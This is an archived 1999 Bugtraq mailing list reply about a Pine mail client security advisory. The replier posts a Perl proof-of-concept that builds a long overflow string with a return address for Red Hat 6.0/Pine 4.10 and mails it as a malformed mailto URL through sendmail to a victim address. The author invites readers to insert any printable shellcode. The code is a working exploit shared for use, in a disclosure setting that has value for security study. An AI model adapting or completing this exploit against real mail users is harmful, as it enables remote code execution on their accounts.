Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Caldera Pine Advisory

From: fygrave () EPR0 ORG (CyberPsychotic)
Date: Thu, 18 Nov 1999 21:43:14 +0500

~:   Versions of pine prior to 4.21 had a security problem when viewing
~:   URLs. By sending an email with a specially formatted URL embedded
~:   in it, an attacker could cause arbitrary shell code to be executed
~:   under the account of the victim user.
~:

I don't know how dumb user should be to actually to become a victim of
such exploitation. Not saying that the bug shouldn't be fixed anywayz.
if anyone's interested:

#!/usr/bin/perl
$sploit="A" x 1078;
$sploit .="\@1111"; # rh 6.0/pine4.10 would love return address  0x82d4528
        # or higher..
open(FOO,"| /usr/sbin/sendmail -t");
print FOO "From: bogus\@yahoo.com\nTo: victim\@somehost\n\n";
print FOO "Mail me: mailto:$sploit";;
close(FOO);

pull any shellcode you like (but mind it should contain only printable
characters 0x20-xff worked for me).

-Fyodor
Previous By Date Next
Previous By Thread Next

Current thread: